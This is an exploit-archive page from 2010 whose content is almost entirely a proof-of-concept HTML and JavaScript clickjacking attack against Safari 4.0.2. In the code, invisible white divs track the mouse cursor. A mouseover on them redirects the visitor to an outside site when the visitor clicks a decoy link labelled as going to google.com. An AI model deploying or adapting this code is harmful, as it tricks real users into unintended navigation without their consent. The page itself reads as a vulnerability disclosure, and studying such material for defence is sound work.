Safari Browser v4.0.2 Clickjacking Vulnerability
Posted on 17 July 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Safari Browser v4.0.2 Clickjacking Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>================================================ Safari Browser v4.0.2 Clickjacking Vulnerability ================================================ <html> <style type="text/css"> </style> <body> <p align="center"><code class="xml plain"><font face="Calibri" size="6"> Safari</font><font face="Calibri" size="6" color="#FF0000"> </font><font face="Calibri" size="6"> Browser</font><font face="Calibri" size="6" color="#FF0000"> </font></code> <font face="Arial" size="2"><code class="xml plain"> (V4.0.2)</code></font><font face="Calibri" size="6" color="#FF0000"><code class="xml plain"> <b>Clickjacking</b></code></font></p> <p align="center"> </p> <div class="style1" id="open" style="position:absolute; width:2px; height:2px; background:#FFFFFF; border:1px; left: 2px; top: 2px;" onmouseover="document.location='http://www.Securitylab.ir/ClickJacking';"> <p align="center"> <font size="1" color="#FFFFFF">ClickJacking</font></div> <p align="center"><strong> <script> function updatebox(evt) { mouseX=evt.pageX?evt.pageX:evt.clientX; mouseY=evt.pageY?evt.pageY:evt.clientY; document.getElementById('open').style.left=mouseX-2; document.getElementById('open').style.top=mouseY-2; } </script> </strong><a href="http://www.google.com" onClick="updatebox(event)"><font style="font-family:arial;font-size:32px">Go to the google.com</font></a></p> <p><br> </p> <div class="style1" id="open0" style="position:absolute; width:2px; height:13px; background:#FFFFFF; border:1px none; left: 354px; top: 146px;" onmouseover="document.location='http://www.Securitylab.ir/ClickJacking';"> <p align="center"> <p align="center"> <font size="1" color="#FFFFFF">ClickJacking</font></div> <p align="center"> </p> <p align="center"> </p> <p align="center">Discovered by: Pouya Daneshmand (whh_iran[at]yahoo[dot]com)</p> <p align="center">http://Securitylab.ir/Advisory</p> </html> # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-17]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>